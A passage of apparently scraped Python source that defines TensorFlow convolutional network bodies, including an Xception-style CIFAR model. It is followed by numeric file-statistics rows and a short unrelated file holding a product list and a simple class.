toadd = net.output
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
activation=Layer.ReLU, \
name='Conv6', dtype=tf.float32)
layers.append(net)
added = toadd + net.output
net = Layer.Conv2D(added, convChannels=128, \
convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Conv7', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Conv8', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=1024, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
return net.output, layers
def SimpleNetBody(network, images):
layers = []
standardized = tf.identity(images / 127.5 - 1, name='images_standardized')
net = Layer.DepthwiseConv2D(standardized, convChannels=3*16, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='DepthwiseConv3x16', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='SepConv96', dtype=tf.float32)
layers.append(net)
toadd = Layer.Conv2D(net.output, convChannels=192, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='SepConv192Shortcut', dtype=tf.float32)
layers.append(toadd)
net = Layer.SepConv2D(net.output, convChannels=192, \
convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='SepConv192a', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=192, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='SepConv192b', dtype=tf.float32)
layers.append(net)
added = toadd.output + net.output
toadd = Layer.Conv2D(added, convChannels=384, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='SepConv384Shortcut', dtype=tf.float32)
layers.append(toadd)
net = Layer.Activation(added, activation=Layer.ReLU, name='ReLU384')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=384, \
convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='SepConv384a', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='SepConv384b', dtype=tf.float32)
layers.append(net)
added = toadd.output + net.output
toadd = Layer.Conv2D(added, convChannels=768, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='SepConv768Shortcut', dtype=tf.float32)
layers.append(toadd)
net = Layer.Activation(added, activation=Layer.ReLU, name='ReLU768')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=768, \
convKernel=[3, 3], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='SepConv768a', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=768, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='SepConv768b', dtype=tf.float32)
layers.append(net)
added = toadd.output + net.output
net = Layer.Activation(added, activation=Layer.ReLU, name='ReLU11024')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=1024, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='SepConv1024', dtype=tf.float32)
layers.append(net)
net = Layer.GlobalAvgPool(net.output, name='GlobalAvgPool')
layers.append(net)
return net.output, layers
def ConcatNetBody(network, images):
layers = []
standardized = tf.identity(images / 127.5 - 1, name='images_standardized')
net = Layer.DepthwiseConv2D(standardized, convChannels=3*16, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='DepthwiseConv3x16', dtype=tf.float32)
layers.append(net)
toconcat = Layer.Conv2D(net.output, convChannels=48, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage1_Conv_48a', dtype=tf.float32)
layers.append(toconcat)
net = Layer.Conv2D(toconcat.output, convChannels=96, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage1_Conv1x1_96', dtype=tf.float32)
layers.append(net)
net = Layer.DepthwiseConv2D(net.output, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage1_DepthwiseConv96', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=48, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.Linear, \
name='Stage1_Conv1x1_48b', dtype=tf.float32)
layers.append(net)
concated = tf.concat([toconcat.output, net.output], axis=3)
toconcat = Layer.Conv2D(concated, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage2_Conv_96a', dtype=tf.float32)
layers.append(toconcat)
net = Layer.Conv2D(toconcat.output, convChannels=192, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage2_Conv1x1_192', dtype=tf.float32)
layers.append(net)
net = Layer.DepthwiseConv2D(net.output, convChannels=192, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage2_DepthwiseConv192', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=96, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.Linear, \
name='Stage2_Conv1x1_96b', dtype=tf.float32)
layers.append(net)
concated = tf.concat([toconcat.output, net.output], axis=3)
toconcat = Layer.Conv2D(concated, convChannels=192, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='Stage3_Conv_192a', dtype=tf.float32)
layers.append(toconcat)
net = Layer.Conv2D(toconcat.output, convChannels=384, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage3_Conv1x1_384', dtype=tf.float32)
layers.append(net)
net = Layer.DepthwiseConv2D(net.output, convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage3_DepthwiseConv384', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=192, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.Linear, \
name='Stage3_Conv1x1_192b', dtype=tf.float32)
layers.append(net)
concated = tf.concat([toconcat.output, net.output], axis=3)
toconcat = Layer.Conv2D(concated, convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='Stage4_Conv_384a', dtype=tf.float32)
layers.append(toconcat)
net = Layer.Conv2D(toconcat.output, convChannels=768, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage4_Conv1x1_768', dtype=tf.float32)
layers.append(net)
net = Layer.DepthwiseConv2D(net.output, convChannels=768, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Stage4_DepthwiseConv768', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=384, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.Linear, \
name='Stage4_Conv1x1_384b', dtype=tf.float32)
layers.append(net)
concated = tf.concat([toconcat.output, net.output], axis=3)
toadd = Layer.Conv2D(concated, convChannels=768, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.Linear, \
name='SepConv768Toadd', dtype=tf.float32)
layers.append(toadd)
conved = toadd.output
for idx in range(network._numMiddle):
net = Layer.Activation(conved, Layer.ReLU, name='ActMiddle'+str(idx)+'_1')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=768, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvMiddle'+str(idx)+'_1', dtype=tf.float32)
layers.append(net)
net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_2')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=768, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvMiddle'+str(idx)+'_2', dtype=tf.float32)
layers.append(net)
net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_3')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=768, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvMiddle'+str(idx)+'_3', dtype=tf.float32)
layers.append(net)
conved = net.output + conved
toadd = Layer.Conv2D(conved, convChannels=1536, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='ConvExit1x1_1', dtype=tf.float32)
layers.append(toadd)
net = Layer.Activation(conved, Layer.ReLU, name='ActExit768_1')
layers.append(net)
toconcat = Layer.Conv2D(net.output, convChannels=768, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='ConvExit768_1', dtype=tf.float32)
layers.append(toconcat)
net = Layer.Conv2D(toconcat.output, convChannels=1536, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Exit_Conv1x1_1536', dtype=tf.float32)
layers.append(net)
net = Layer.DepthwiseConv2D(net.output, convChannels=1536, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='Exit_DepthwiseConv1536', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=768, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.Linear, \
name='Exit_Conv1x1_768b', dtype=tf.float32)
layers.append(net)
concated = tf.concat([toconcat.output, net.output], axis=3)
added = concated + toadd.output
net = Layer.SepConv2D(added, convChannels=2048, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvExit2048_1', dtype=tf.float32)
layers.append(net)
net = Layer.GlobalAvgPool(net.output, name='GlobalAvgPool')
layers.append(net)
return net.output, layers
def XcepCIFAR(network, images):
layers = []
standardized = tf.identity(images / 127.5 - 1, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvEntry32_1', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvEntry64_1', dtype=tf.float32)
layers.append(net)
toadd = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[1, 1], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvEntry1x1_1', dtype=tf.float32)
layers.append(toadd)
net = Layer.SepConv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvEntry128_1', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvEntry128_2', dtype=tf.float32)
layers.append(net)
added = toadd.output + net.output
toadd = Layer.Conv2D(added, convChannels=256, \
convKernel=[1, 1], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvEntry1x1_2', dtype=tf.float32)
layers.append(toadd)
acted = Layer.Activation(added, Layer.ReLU, name='ReLUEntry256_0')
layers.append(acted)
net = Layer.SepConv2D(acted.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvEntry256_1', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='ConvEntry256_2', dtype=tf.float32)
layers.append(net)
added = toadd.output + net.output
toadd = Layer.Conv2D(added, convChannels=728, \
convKernel=[1, 1], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvEntry1x1_3', dtype=tf.float32)
layers.append(toadd)
acted = Layer.Activation(added, Layer.ReLU, name='ReLUEntry728_0')
layers.append(acted)
net = Layer.SepConv2D(acted.output, convChannels=728, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvEntry728_1', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=728, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='ConvEntry728_2', dtype=tf.float32)
layers.append(net)
added = toadd.output + net.output
conved = added
for idx in range(network._numMiddle):
net = Layer.Activation(conved, Layer.ReLU, name='ActMiddle'+str(idx)+'_1')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=728, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvMiddle'+str(idx)+'_1', dtype=tf.float32)
layers.append(net)
net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_2')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=728, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvMiddle'+str(idx)+'_2', dtype=tf.float32)
layers.append(net)
net = Layer.Activation(net.output, Layer.ReLU, name='ReLUMiddle'+str(idx)+'_3')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=728, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvMiddle'+str(idx)+'_3', dtype=tf.float32)
layers.append(net)
conved = net.output + conved
toadd = Layer.Conv2D(conved, convChannels=1024, \
convKernel=[1, 1], convStride=[2, 2], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
name='ConvExit1x1_1', dtype=tf.float32)
layers.append(toadd)
net = Layer.Activation(conved, Layer.ReLU, name='ActExit728_1')
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=728, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvExit728_1', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=1024, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
pool=True, poolSize=[3, 3], poolStride=[2, 2], \
poolType=Layer.MaxPool, poolPadding='SAME', \
name='ConvExit1024_1', dtype=tf.float32)
layers.append(net)
added = toadd.output + net.output
net = Layer.SepConv2D(added, convChannels=1536, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvExit1536_1', dtype=tf.float32)
layers.append(net)
net = Layer.SepConv2D(net.output, convChannels=2048, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-5, \
activation=Layer.ReLU, \
name='ConvExit2048_1', dtype=tf.float32)
layers.append(net)
net = Layer.GlobalAvgPool(net.output, name='GlobalAvgPool')
layers.append(net)
return net.output, layers
| 61.173824
| 189
| 0.54512
| 21,040
| 209,398
| 5.310884
| 0.022814
| 0.042974
| 0.030445
| 0.036209
| 0.957384
| 0.953634
| 0.948452
| 0.946152
| 0.942689
| 0.941875
| 0
| 0.034116
| 0.31997
| 209,398
| 3,422
| 190
| 61.191701
| 0.750599
| 0.104313
| 0
| 0.902861
| 0
| 0
| 0.053168
| 0.000604
| 0
| 0
| 0
| 0
| 0.002826
| 1
| 0.026139
| false
| 0.001413
| 0.002119
| 0.000353
| 0.049099
| 0.024373
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
408e965571886bdd1a11ae164c4e6a3ec90948ca
| 1,202
|
py
|
Python
|
python/module/data.py
|
PythonXCII/internship_aug2020
|
3e10bc7ced0c8f8efb5d5d2d8cf6809a82363ea0
|
[
"Unlicense"
] | null | null | null |
python/module/data.py
|
PythonXCII/internship_aug2020
|
3e10bc7ced0c8f8efb5d5d2d8cf6809a82363ea0
|
[
"Unlicense"
] | null | null | null |
python/module/data.py
|
PythonXCII/internship_aug2020
|
3e10bc7ced0c8f8efb5d5d2d8cf6809a82363ea0
|
[
"Unlicense"
] | null | null | null |
products = [
{"name": "Prod1", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod2", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod3", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod4", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod5", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod6", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod7", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod8", "amount": {"min": 10000, "max": 99999}, "price": {"min": 1, "max": 100}},
{"name": "Prod9", "amount": {"min": 10000, "max": 99999}, "price": {"min": 0, "max": 100}},
{"name": "Prod10", "amount": {"min": 10000, "max": 99999}, "price": {"min": 0, "max": 100}},
]
obj_list = []
class ParentProduct:
def __init__(self, name):
self.name = name
def show_name(self):
print(f"Name of this product is {self.name}")
return f"Name of this product is {self.name}"
| 52.26087
| 96
| 0.506656
| 154
| 1,202
| 3.915584
